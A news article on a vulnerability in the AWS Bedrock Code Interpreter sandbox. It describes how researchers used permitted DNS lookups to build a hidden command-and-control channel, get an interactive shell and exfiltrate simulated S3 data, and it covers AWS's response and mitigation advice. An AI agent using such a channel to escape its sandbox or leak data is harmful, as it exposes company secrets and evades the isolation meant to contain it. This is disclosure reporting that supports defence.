Security researchers have uncovered a vulnerability in an artificial intelligence tool from Amazon Web Services that could potentially allow attackers to leak sensitive company data. The issue affects the Code Interpreter used in AWS Bedrock, a platform designed to help companies build and run generative AI applications.
The discovery comes from Phantom Labs, the research arm of identity security company BeyondTrust. According to the researchers, the flaw could allow attackers to bypass the isolation environment designed to protect systems running AI-generated code.
AWS Bedrock allows developers to build AI-powered tools such as chatbots and automated agents that can write and execute code. The Code Interpreter feature plays an important role in this process. It runs generated code inside a restricted “Sandbox” environment that is supposed to isolate the execution from the rest of the internet and the company’s infrastructure.
Due to the sandbox, even if AI generates unsafe code, the environment would prevent it from communicating with external systems or leaking sensitive data.
However, Phantom Labs researcher Kinnaird McQuade discovered that the sandbox does not completely block outbound communication. While most internet traffic is restricted, the system still allows certain DNS queries, specifically A and AAAA record lookups.
DNS queries are normally used to translate domain names into IP addresses so that systems can locate servers on the Internet. But the researchers found that these queries can be used for something very different.
By embedding small pieces of encoded data inside DNS requests, attackers could secretly transmit information out of the sandbox environment. The team demonstrated that this method can create a hidden communication channel between the isolated AI system and an external server.
To prove the risk, the researchers developed a proof-of-concept system that used DNS queries to establish a command-and-control channel. Commands could be sent to the interpreter through specially crafted DNS responses, while the output of those commands could be returned through encoded subdomain requests.
With this approach, the researchers were able to achieve an interactive shell inside the sandboxed environment. This means an attacker could run commands remotely and receive results without triggering traditional network restrictions.
This could become serious when the interpreter has access to cloud resources. The research showed that the interpreter can interact with services such as Amazon S3 if its assigned identity role allows it. During testing, the team was able to list storage buckets and retrieve files containing simulated customer records, API keys, and financial data. All of this information was then exfiltrated through DNS queries.
The vulnerability was first reported to AWS in September 2025 through its vulnerability disclosure program. By November, AWS had deployed a fix intended to block the data leakage. However, the patch was later rolled back due to technical issues.
In December, AWS informed the researchers that it would not release another patch. Instead, the company updated its documentation to clarify how the sandbox environment works and noted that DNS resolution is allowed in this mode.
The vulnerability received a severity score of 7.5 out of 10 under the CVSS rating system. As part of the bug bounty program, the researcher received a $100 gift card for the Amazon Gear Shop.
The discovery of this issue also shows a challenge in the rapidly evolving AI ecosystem. Many modern AI tools are no longer limited to generating text. They can write scripts, execute commands, and interact with cloud infrastructure directly. This increases the potential attack surface. If attackers can manipulate an AI agent through prompt injection, malicious datasets, or compromised dependencies, the agent may execute harmful code without realizing it.
Code Interpreter environments are particularly sensitive because they often run with permissions that allow access to internal data or cloud services. If those permissions are too broad, an attacker could potentially use the AI system itself as a gateway to sensitive resources.
The researchers recommend that organizations review how their Bedrock environments are configured, especially the permissions granted to Code Interpreter roles. Limiting access to only the resources that are absolutely necessary can significantly reduce the impact of such attacks.
Companies that require stronger network isolation are also advised to run the interpreter in controlled network environments rather than relying on the default sandbox configuration.







